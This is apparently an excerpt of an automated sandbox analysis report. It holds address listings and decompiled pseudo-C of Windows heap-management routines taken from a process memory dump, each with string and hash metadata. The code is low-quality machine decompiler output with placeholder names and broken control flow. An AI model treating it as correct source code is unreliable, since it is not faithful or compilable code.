                          0x00000000
                          0x01403fbc
                          0x01403fc1
                          0x01403fc9
                          0x01403fd7
                          0x01403fda
                          0x01403fdd
                          0x01404021
                          0x01404021
                          0x01404029
                          0x01404030
                          0x01404044
                          0x01404046
                          0x01404046
                          0x01404044
                          0x01404049
                          0x01458327
                          0x01458334
                          0x01458339
                          0x0145833c
                          0x0140404f
                          0x0140404f
                          0x0140404f
                          0x01404051
                          0x01404056
                          0x01404063
                          0x01404063
                          0x01404068
                          0x00000000
                          0x01404068
                          0x01403fdf
                          0x01403fe2
                          0x01403fe4
                          0x01403fe7
                          0x01403fef
                          0x01404003
                          0x01404005
                          0x01404005
                          0x0140400c
                          0x01404013
                          0x01404016
                          0x01404017
                          0x0140401b
                          0x0140401e
                          0x00000000
                          0x0140401e
                          0x01403fb6
                          0x01403eb1
                          0x01403eb4
                          0x01403eb7
                          0x01403ebc
                          0x014582a9
                          0x014582ab
                          0x01403ec2
                          0x01403ed3
                          0x01403ed5
                          0x01403ed8
                          0x01403ed8
                          0x01403edd
                          0x014582b3
                          0x014582b6
                          0x00000000
                          0x01403ee3
                          0x01403ee8
                          0x01403eed
                          0x01403ef0
                          0x01403ef3
                          0x01403f02
                          0x01403f05
                          0x01403f08
                          0x014582c0
                          0x014582c3
                          0x014582c5
                          0x014582c8
                          0x014582d0
                          0x014582e4
                          0x014582e6
                          0x014582e6
                          0x014582ed
                          0x014582f4
                          0x014582f7
                          0x014582f8
                          0x014582fc
                          0x014582ff
                          0x014582ff
                          0x01403f0e
                          0x01403f11
                          0x01403f16
                          0x01403f1d
                          0x01403f31
                          0x01458307
                          0x01458307
                          0x01403f31
                          0x01403f39
                          0x01403f48
                          0x01403f4d
                          0x01403f50
                          0x01403f50
                          0x01403f53
                          0x01403f58
                          0x01403f65
                          0x01403f65
                          0x01403f6a
                          0x00000000
                          0x01403f6a
                          0x01403edd
                          0x01403dda
                          0x01403ddd
                          0x01403de0
                          0x01403de5
                          0x01458245
                          0x01403deb
                          0x01403df7
                          0x01403dfc
                          0x01403dfe
                          0x01403e01
                          0x01403e01
                          0x01403e06
                          0x0145824d
                          0x0145824f
                          0x01458254
                          0x00000000
                          0x01403e0c
                          0x01403e11
                          0x01403e16
                          0x01403e19
                          0x01403e29
                          0x01403e2c
                          0x01403e2f
                          0x0145825c
                          0x0145825f
                          0x01458261
                          0x01458264
                          0x0145826c
                          0x01458280
                          0x01458282
                          0x01458282
                          0x01458289
                          0x01458290
                          0x01458293
                          0x01458294
                          0x01458298
                          0x0145829b
                          0x0145829b
                          0x01403e35
                          0x01403e38
                          0x01403e3d
                          0x01403e44
                          0x01403e58
                          0x014582a3
                          0x014582a3
                          0x01403e58
                          0x01403e60
                          0x01403e6f
                          0x01403e74
                          0x01403e77
                          0x01403e77
                          0x01403e7a
                          0x01403e7f
                          0x01403e8c
                          0x01403e8c
                          0x01403e91
                          0x00000000
                          0x01403e91

                          Strings
                          • WindowsExcludedProcs, xrefs: 01403D6F
                          • Kernel-MUI-Language-Allowed, xrefs: 01403DC0
                          • Kernel-MUI-Language-Disallowed, xrefs: 01403E97
                          • Kernel-MUI-Number-Allowed, xrefs: 01403D8C
                          • Kernel-MUI-Language-SKU, xrefs: 01403F70
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                          • API String ID: 0-258546922
                          • Opcode ID: 69aaaa2640702ed506b4efa67541d1532f222ddd96205cdf7ef13bbe0b8ba42f
                          • Instruction ID: d83a2dea379a4b4a83b3beeade1b1c7094b5b3831c4f53a67355d8b417e1d416
                          • Opcode Fuzzy Hash: 69aaaa2640702ed506b4efa67541d1532f222ddd96205cdf7ef13bbe0b8ba42f
                          • Instruction Fuzzy Hash: 19F15F76D00619EFCB12DF9AC980AEFBBB9FF58650F14006BE905A7261D7309E01CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 29%
                          			E013F40E1(void* __edx) {
                          				void* _t19;
                          				void* _t29;
                          
                          				_t28 = _t19;
                          				_t29 = __edx;
                          				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                          						_push("HEAP: ");
                          						E013FB150();
                          					} else {
                          						E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          					}
                          					E013FB150("Invalid heap signature for heap at %p", _t28);
                          					if(_t29 != 0) {
                          						E013FB150(", passed to %s", _t29);
                          					}
                          					_push("\n");
                          					E013FB150();
                          					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                          						 *0x14e6378 = 1;
                          						asm("int3");
                          						 *0x14e6378 = 0;
                          					}
                          					return 0;
                          				}
                          				return 1;
                          			}





                          0x013f40e6
                          0x013f40e8
                          0x013f40f1
                          0x0145042d
                          0x0145044c
                          0x01450451
                          0x0145042f
                          0x01450444
                          0x01450449
                          0x0145045d
                          0x01450466
                          0x0145046e
                          0x01450474
                          0x01450475
                          0x0145047a
                          0x0145048a
                          0x0145048c
                          0x01450493
                          0x01450494
                          0x01450494
                          0x00000000
                          0x0145049b
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                          • API String ID: 0-188067316
                          • Opcode ID: 8cf704a95a90e645bee1332d38c83c79e253a79d8a43f13a35658a7ecd33c700
                          • Instruction ID: 87f9e28d0e43f7abc3a5058fc9f8f8ce07ec02c660699591e5b343ff5ee5f816
                          • Opcode Fuzzy Hash: 8cf704a95a90e645bee1332d38c83c79e253a79d8a43f13a35658a7ecd33c700
                          • Instruction Fuzzy Hash: F7014CB71002419EE325976EF40EF53BBA4DF01B38F19403EF5044B752CBB49440C211
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 70%
                          			E0141A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                          				void* _v5;
                          				signed short _v12;
                          				intOrPtr _v16;
                          				signed int _v20;
                          				signed short _v24;
                          				signed short _v28;
                          				signed int _v32;
                          				signed short _v36;
                          				signed int _v40;
                          				intOrPtr _v44;
                          				intOrPtr _v48;
                          				signed short* _v52;
                          				void* __ebx;
                          				void* __edi;
                          				void* __ebp;
                          				signed int _t131;
                          				signed char _t134;
                          				signed int _t138;
                          				char _t141;
                          				signed short _t142;
                          				void* _t146;
                          				signed short _t147;
                          				intOrPtr* _t149;
                          				intOrPtr _t156;
                          				signed int _t167;
                          				signed int _t168;
                          				signed short* _t173;
                          				signed short _t174;
                          				intOrPtr* _t182;
                          				signed short _t184;
                          				intOrPtr* _t187;
                          				intOrPtr _t197;
                          				intOrPtr _t206;
                          				intOrPtr _t210;
                          				signed short _t211;
                          				intOrPtr* _t212;
                          				signed short _t214;
                          				signed int _t216;
                          				intOrPtr _t217;
                          				signed char _t225;
                          				signed short _t235;
                          				signed int _t237;
                          				intOrPtr* _t238;
                          				signed int _t242;
                          				unsigned int _t245;
                          				signed int _t251;
                          				intOrPtr* _t252;
                          				signed int _t253;
                          				intOrPtr* _t255;
                          				signed int _t256;
                          				void* _t257;
                          				void* _t260;
                          
                          				_t256 = __edx;
                          				_t206 = __ecx;
                          				_t235 = _a4;
                          				_v44 = __ecx;
                          				_v24 = _t235;
                          				if(_t235 == 0) {
                          					L41:
                          					return _t131;
                          				}
                          				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                          				if(_t251 == 0) {
                          					__eflags =  *0x14e8748 - 1;
                          					if( *0x14e8748 >= 1) {
                          						__eflags =  *(__edx + 2) & 0x00000008;
                          						if(( *(__edx + 2) & 0x00000008) == 0) {
                          							_t110 = _t256 + 0xfff; // 0xfe7
                          							__eflags = (_t110 & 0xfffff000) - __edx;
                          							if((_t110 & 0xfffff000) != __edx) {
                          								_t197 =  *[fs:0x30];
                          								__eflags =  *(_t197 + 0xc);
                          								if( *(_t197 + 0xc) == 0) {
                          									_push("HEAP: ");
                          									E013FB150();
                          									_t260 = _t257 + 4;
                          								} else {
                          									E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          									_t260 = _t257 + 8;
                          								}
                          								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                          								E013FB150();
                          								_t257 = _t260 + 4;
                          								__eflags =  *0x14e7bc8;
                          								if(__eflags == 0) {
                          									E014B2073(_t206, 1, _t251, __eflags);
                          								}
                          								_t235 = _v24;
                          							}
                          						}
                          					}
                          				}
                          				_t134 =  *((intOrPtr*)(_t256 + 6));
                          				if(_t134 == 0) {
                          					_t210 = _t206;
                          					_v48 = _t206;
                          				} else {
                          					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                          					_v48 = _t210;
                          				}
                          				_v5 =  *(_t256 + 2);
                          				do {
                          					if(_t235 > 0xfe00) {
                          						_v12 = 0xfe00;
                          						__eflags = _t235 - 0xfe01;
                          						if(_t235 == 0xfe01) {
                          							_v12 = 0xfdf0;
                          						}
                          						_t138 = 0;
                          					} else {
                          						_v12 = _t235 & 0x0000ffff;
                          						_t138 = _v5;
                          					}
                          					 *(_t256 + 2) = _t138;
                          					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                          					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                          					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                          						_t141 = 0;
                          					} else {
                          						_t141 = (_t256 - _t210 >> 0x10) + 1;
                          						_v40 = _t141;
                          						if(_t141 >= 0xfe) {
                          							_push(_t210);
                          							E014BA80D(_t236, _t256, _t210, 0);
                          							_t141 = _v40;
                          						}
                          					}
                          					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                          					 *((char*)(_t256 + 6)) = _t141;
                          					_t142 = _v12;
                          					 *_t256 = _t142;
                          					 *(_t256 + 3) = 0;
                          					_t211 = _t142 & 0x0000ffff;
                          					 *((char*)(_t256 + 7)) = 0;
                          					_v20 = _t211;
                          					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                          						_t119 = _t256 + 0x10; // -8
                          						E0144D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                          						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                          						_t211 = _v20;
                          					}
                          					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                          					if(_t252 == 0) {
                          						L56:
                          						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                          						_t146 = _t206 + 0xc0;
                          						goto L19;
                          					} else {
                          						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                          							L15:
                          							_t185 = _t211;
                          							goto L17;
                          						} else {
                          							while(1) {
                          								_t187 =  *_t252;
                          								if(_t187 == 0) {
                          									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                          									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                          									goto L17;
                          								}
                          								_t252 = _t187;
                          								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                          									continue;
                          								}
                          								goto L15;
                          							}
                          							while(1) {
                          								L17:
                          								_t212 = E0141AB40(_t206, _t252, 1, _t185, _t211);
                          								if(_t212 != 0) {
                          									_t146 = _t206 + 0xc0;
                          									break;
                          								}
                          								_t252 =  *_t252;
                          								_t211 = _v20;
                          								_t185 =  *(_t252 + 0x14);
                          							}
                          							L19:
                          							if(_t146 != _t212) {
                          								_t237 =  *(_t206 + 0x4c);
                          								_t253 = _v20;
                          								while(1) {
                          									__eflags = _t237;
                          									if(_t237 == 0) {
                          										_t147 =  *(_t212 - 8) & 0x0000ffff;
                          									} else {
                          										_t184 =  *(_t212 - 8);
                          										_t237 =  *(_t206 + 0x4c);
                          										__eflags = _t184 & _t237;
                          										if((_t184 & _t237) != 0) {
                          											_t184 = _t184 ^  *(_t206 + 0x50);
                          											__eflags = _t184;
                          										}
                          										_t147 = _t184 & 0x0000ffff;
                          									}
                          									__eflags = _t253 - (_t147 & 0x0000ffff);
                          									if(_t253 <= (_t147 & 0x0000ffff)) {
                          										goto L20;
                          									}
                          									_t212 =  *_t212;
                          									__eflags = _t206 + 0xc0 - _t212;
                          									if(_t206 + 0xc0 != _t212) {
                          										continue;
                          									} else {
                          										goto L20;
                          									}
                          									goto L56;
                          								}
                          							}
                          							L20:
                          							_t149 =  *((intOrPtr*)(_t212 + 4));
                          							_t33 = _t256 + 8; // -16
                          							_t238 = _t33;
                          							_t254 =  *_t149;
                          							if( *_t149 != _t212) {
                          								_push(_t212);
                          								E014BA80D(0, _t212, 0, _t254);
                          							} else {
                          								 *_t238 = _t212;
                          								 *((intOrPtr*)(_t238 + 4)) = _t149;
                          								 *_t149 = _t238;
                          								 *((intOrPtr*)(_t212 + 4)) = _t238;
                          							}
                          							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                          							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                          							if(_t255 == 0) {
                          								L36:
                          								if( *(_t206 + 0x4c) != 0) {
                          									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                          									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                          								}
                          								_t210 = _v48;
                          								_t251 = _v12 & 0x0000ffff;
                          								_t131 = _v20;
                          								_t235 = _v24 - _t131;
                          								_v24 = _t235;
                          								_t256 = _t256 + _t131 * 8;
                          								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                          									goto L41;
                          								} else {
                          									goto L39;
                          								}
                          							} else {
                          								_t216 =  *_t256 & 0x0000ffff;
                          								_v28 = _t216;
                          								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                          									L28:
                          									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                          									_v32 = _t242;
                          									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                          										_t167 = _t242 + _t242;
                          									} else {
                          										_t167 = _t242;
                          									}
                          									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                          									_t168 = _t167 << 2;
                          									_v40 = _t168;
                          									_t206 = _v44;
                          									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                          									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                          										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                          									}
                          									_t217 = _v16;
                          									if(_t217 != 0) {
                          										_t173 = _t217 - 8;
                          										_v52 = _t173;
                          										_t174 =  *_t173;
                          										__eflags =  *(_t206 + 0x4c);
                          										if( *(_t206 + 0x4c) != 0) {
                          											_t245 =  *(_t206 + 0x50) ^ _t174;
                          											_v36 = _t245;
                          											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                          											__eflags = _t245 >> 0x18 - _t225;
                          											if(_t245 >> 0x18 != _t225) {
                          												_push(_t225);
                          												E014BA80D(_t206, _v52, 0, 0);
                          											}
                          											_t174 = _v36;
                          											_t217 = _v16;
                          											_t242 = _v32;
                          										}
                          										_v28 = _v28 - (_t174 & 0x0000ffff);
                          										__eflags = _v28;
                          										if(_v28 > 0) {
                          											goto L34;
                          										} else {
                          											goto L33;
                          										}
                          									} else {
                          										L33:
                          										_t58 = _t256 + 8; // -16
                          										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                          										_t206 = _v44;
                          										_t217 = _v16;
                          										L34:
                          										if(_t217 == 0) {
                          											asm("bts eax, edx");
                          										}
                          										goto L36;
                          									}
                          								} else {
                          									goto L24;
                          								}
                          								while(1) {
                          									L24:
                          									_t182 =  *_t255;
                          									if(_t182 == 0) {
                          										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                          										__eflags = _t216;
                          										goto L28;
                          									}
                          									_t255 = _t182;
                          									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                          										continue;
                          									} else {
                          										goto L28;
                          									}
                          								}
                          								goto L28;
                          							}
                          						}
                          					}
                          					L39:
                          				} while (_t235 != 0);
                          				_t214 = _v12;
                          				_t131 =  *(_t206 + 0x54) ^ _t214;
                          				 *(_t256 + 4) = _t131;
                          				if(_t214 == 0) {
                          					__eflags =  *0x14e8748 - 1;
                          					if( *0x14e8748 >= 1) {
                          						_t127 = _t256 + 0xfff; // 0xfff
                          						_t131 = _t127 & 0xfffff000;
                          						__eflags = _t131 - _t256;
                          						if(_t131 != _t256) {
                          							_t156 =  *[fs:0x30];
                          							__eflags =  *(_t156 + 0xc);
                          							if( *(_t156 + 0xc) == 0) {
                          								_push("HEAP: ");
                          								E013FB150();
                          							} else {
                          								E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          							}
                          							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                          							_t131 = E013FB150();
                          							__eflags =  *0x14e7bc8;
                          							if(__eflags == 0) {
                          								_t131 = E014B2073(_t206, 1, _t251, __eflags);
                          							}
                          						}
                          					}
                          				}
                          				goto L41;
                          			}























































                          0x0141a83a
                          0x0141a83c
                          0x0141a83e
                          0x0141a841
                          0x0141a844
                          0x0141a84a
                          0x0141aa53
                          0x0141aa59
                          0x0141aa59
                          0x0141a858
                          0x0141a85e
                          0x0141aaf5
                          0x0141aafc
                          0x0146229e
                          0x014622a2
                          0x014622a8
                          0x014622b3
                          0x014622b5
                          0x014622bb
                          0x014622c1
                          0x014622c5
                          0x014622e6
                          0x014622eb
                          0x014622f0
                          0x014622c7
                          0x014622dc
                          0x014622e1
                          0x014622e1
                          0x014622f3
                          0x014622f8
                          0x014622fd
                          0x01462300
                          0x01462307
                          0x0146230e
                          0x0146230e
                          0x01462313
                          0x01462313
                          0x014622b5
                          0x014622a2
                          0x0141aafc
                          0x0141a864
                          0x0141a869
                          0x0141aa5c
                          0x0141aa5e
                          0x0141a86f
                          0x0141a87f
                          0x0141a885
                          0x0141a885
                          0x0141a88b
                          0x0141a890
                          0x0141a896
                          0x0141ab0c
                          0x0141ab0f
                          0x0141ab15
                          0x01462320
                          0x01462320
                          0x0141ab1b
                          0x0141a89c
                          0x0141a89f
                          0x0141a8a2
                          0x0141a8a2
                          0x0141a8a5
                          0x0141a8af
                          0x0141a8b3
                          0x0141a8b8
                          0x0141aa66
                          0x0141a8be
                          0x0141a8c5
                          0x0141a8c6
                          0x0141a8ce
                          0x01462328
                          0x01462332
                          0x01462337
                          0x01462337
                          0x0141a8ce
                          0x0141a8d4
                          0x0141a8d8
                          0x0141a8db
                          0x0141a8de
                          0x0141a8e1
                          0x0141a8e5
                          0x0141a8e8
                          0x0141a8f0
                          0x0141a8f3
                          0x0146234c
                          0x01462350
                          0x01462355
                          0x01462359
                          0x01462359
                          0x0141a8f9
                          0x0141a901
                          0x0141aae4
                          0x0141aae4
                          0x0141aaea
                          0x00000000
                          0x0141a907
                          0x0141a90a
                          0x0141a91d
                          0x0141a91d
                          0x00000000
                          0x0141a910
                          0x0141a910
                          0x0141a910
                          0x0141a914
                          0x0141a924
                          0x0141a924
                          0x0141a924
                          0x0141a924
                          0x0141a916
                          0x0141a91b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0141a91b
                          0x0141a925
                          0x0141a925
                          0x0141a932
                          0x0141a936
                          0x0141a93c
                          0x0141a93c
                          0x0141a93c
                          0x0141ab22
                          0x0141ab24
                          0x0141ab27
                          0x0141ab27
                          0x0141a942
                          0x0141a944
                          0x0141aaba
                          0x0141aabd
                          0x0141aac0
                          0x0141aac0
                          0x0141aac2
                          0x0141ab2f
                          0x0141aac4
                          0x0141aac4
                          0x0141aac7
                          0x0141aaca
                          0x0141aacc
                          0x0141aace
                          0x0141aace
                          0x0141aace
                          0x0141aad1
                          0x0141aad1
                          0x0141aad7
                          0x0141aad9
                          0x00000000
                          0x00000000
                          0x01462361
                          0x01462369
                          0x0146236b
                          0x00000000
                          0x01462371
                          0x00000000
                          0x01462371
                          0x00000000
                          0x0146236b
                          0x0141aac0
                          0x0141a94a
                          0x0141a94a
                          0x0141a94d
                          0x0141a94d
                          0x0141a950
                          0x0141a954
                          0x01462376
                          0x01462380
                          0x0141a95a
                          0x0141a95a
                          0x0141a95c
                          0x0141a95f
                          0x0141a961
                          0x0141a961
                          0x0141a967
                          0x0141a96a
                          0x0141a972
                          0x0141aa02
                          0x0141aa06
                          0x0141aa10
                          0x0141aa16
                          0x0141aa16
                          0x0141aa1b
                          0x0141aa21
                          0x0141aa24
                          0x0141aa27
                          0x0141aa29
                          0x0141aa2c
                          0x0141aa32
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0141a978
                          0x0141a978
                          0x0141a97b
                          0x0141a981
                          0x0141a996
                          0x0141a998
                          0x0141a99f
                          0x0141a9a2
                          0x0146238a
                          0x0141a9a8
                          0x0141a9a8
                          0x0141a9a8
                          0x0141a9aa
                          0x0141a9ad
                          0x0141a9b0
                          0x0141a9bb
                          0x0141a9be
                          0x0141a9c7
                          0x0141a9c9
                          0x0141a9c9
                          0x0141a9cc
                          0x0141a9d1
                          0x0141aa6d
                          0x0141aa70
                          0x0141aa73
                          0x0141aa75
                          0x0141aa79
                          0x0141aa7e
                          0x0141aa82
                          0x0141aa8f
                          0x0141aa94
                          0x0141aa96
                          0x01462392
                          0x014623a1
                          0x014623a1
                          0x0141aa9c
                          0x0141aa9f
                          0x0141aaa2
                          0x0141aaa2
                          0x0141aaa8
                          0x0141aaab
                          0x0141aaaf
                          0x00000000
                          0x0141aab5
                          0x00000000
                          0x0141aab5
                          0x0141a9d7
                          0x0141a9d7
                          0x0141a9da
                          0x0141a9e0
                          0x0141a9e3
                          0x0141a9e6
                          0x0141a9e9
                          0x0141a9eb
                          0x0141a9fd
                          0x0141a9fd
                          0x00000000
                          0x0141a9eb
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0141a983
                          0x0141a983
                          0x0141a983
                          0x0141a987
                          0x0141a995
                          0x0141a995
                          0x0141a995
                          0x0141a995
                          0x0141a989
                          0x0141a98e
                          0x00000000
                          0x0141a990
                          0x00000000
                          0x0141a990
                          0x0141a98e
                          0x00000000
                          0x0141a983
                          0x0141a972
                          0x0141a90a
                          0x0141aa34
                          0x0141aa34
                          0x0141aa40
                          0x0141aa43
                          0x0141aa46
                          0x0141aa4d
                          0x014623ab
                          0x014623b2
                          0x014623b8
                          0x014623be
                          0x014623c3
                          0x014623c5
                          0x014623cb
                          0x014623d1
                          0x014623d5
                          0x014623f6
                          0x014623fb
                          0x014623d7
                          0x014623ec
                          0x014623f1
                          0x01462403
                          0x01462408
                          0x01462410
                          0x01462417
                          0x01462422
                          0x01462422
                          0x01462417
                          0x014623c5
                          0x014623b2
                          0x00000000

                          Strings
                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01462403
                          • HEAP: , xrefs: 014622E6, 014623F6
                          • HEAP[%wZ]: , xrefs: 014622D7, 014623E7
                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 014622F3
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                          • API String ID: 0-1657114761
                          • Opcode ID: d85d2f9225e80403de1f51f8bff90907b28bedfbcc92bd8572726995d291d494
                          • Instruction ID: 73b71e602220b1abe355a992dce9d36da57376154b2e2c103e53ba3006d72eb7
                          • Opcode Fuzzy Hash: d85d2f9225e80403de1f51f8bff90907b28bedfbcc92bd8572726995d291d494
                          • Instruction Fuzzy Hash: 01D1F3746012869FDB19CF6CC580BBAB7F2FF44304F24856ED95A9B36AD330A881CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 69%
                          			E0141A229(void* __ecx, void* __edx) {
                          				signed int _v20;
                          				char _v24;
                          				char _v28;
                          				void* _v44;
                          				void* _v48;
                          				void* _v56;
                          				void* _v60;
                          				void* __ebx;
                          				signed int _t55;
                          				signed int _t57;
                          				void* _t61;
                          				intOrPtr _t62;
                          				void* _t65;
                          				void* _t71;
                          				signed char* _t74;
                          				intOrPtr _t75;
                          				signed char* _t80;
                          				intOrPtr _t81;
                          				void* _t82;
                          				signed char* _t85;
                          				signed char _t91;
                          				void* _t103;
                          				void* _t105;
                          				void* _t121;
                          				void* _t129;
                          				signed int _t131;
                          				void* _t133;
                          
                          				_t105 = __ecx;
                          				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                          				_t103 = __edx;
                          				_t129 = __ecx;
                          				E0141DF24(__edx,  &_v28, _t133);
                          				_t55 =  *(_t129 + 0x40) & 0x00040000;
                          				asm("sbb edi, edi");
                          				_t121 = ( ~_t55 & 0x0000003c) + 4;
                          				if(_t55 != 0) {
                          					_push(0);
                          					_push(0x14);
                          					_push( &_v24);
                          					_push(3);
                          					_push(_t129);
                          					_push(0xffffffff);
                          					_t57 = E01439730();
                          					__eflags = _t57;
                          					if(_t57 < 0) {
                          						L17:
                          						_push(_t105);
                          						E014BA80D(_t129, 1, _v20, 0);
                          						_t121 = 4;
                          						goto L1;
                          					}
                          					__eflags = _v20 & 0x00000060;
                          					if((_v20 & 0x00000060) == 0) {
                          						goto L17;
                          					}
                          					__eflags = _v24 - _t129;
                          					if(_v24 == _t129) {
                          						goto L1;
                          					}
                          					goto L17;
                          				}
                          				L1:
                          				_push(_t121);
                          				_push(0x1000);
                          				_push(_t133 + 0x14);
                          				_push(0);
                          				_push(_t133 + 0x20);
                          				_push(0xffffffff);
                          				_t61 = E01439660();
                          				_t122 = _t61;
                          				if(_t61 < 0) {
                          					_t62 =  *[fs:0x30];
                          					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                          					__eflags =  *(_t62 + 0xc);
                          					if( *(_t62 + 0xc) == 0) {
                          						_push("HEAP: ");
                          						E013FB150();
                          					} else {
                          						E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          					}
                          					_push( *((intOrPtr*)(_t133 + 0xc)));
                          					_push( *((intOrPtr*)(_t133 + 0x14)));
                          					_push(_t129);
                          					E013FB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                          					_t65 = 0;
                          					L13:
                          					return _t65;
                          				}
                          				_t71 = E01417D50();
                          				_t124 = 0x7ffe0380;
                          				if(_t71 != 0) {
                          					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          				} else {
                          					_t74 = 0x7ffe0380;
                          				}
                          				if( *_t74 != 0) {
                          					_t75 =  *[fs:0x30];
                          					__eflags =  *(_t75 + 0x240) & 0x00000001;
                          					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                          						E014B138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                          					}
                          				}
                          				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                          				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                          				if(E01417D50() != 0) {
                          					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          				} else {
                          					_t80 = _t124;
                          				}
                          				if( *_t80 != 0) {
                          					_t81 =  *[fs:0x30];
                          					__eflags =  *(_t81 + 0x240) & 0x00000001;
                          					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                          						__eflags = E01417D50();
                          						if(__eflags != 0) {
                          							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          						}
                          						E014B1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                          					}
                          				}
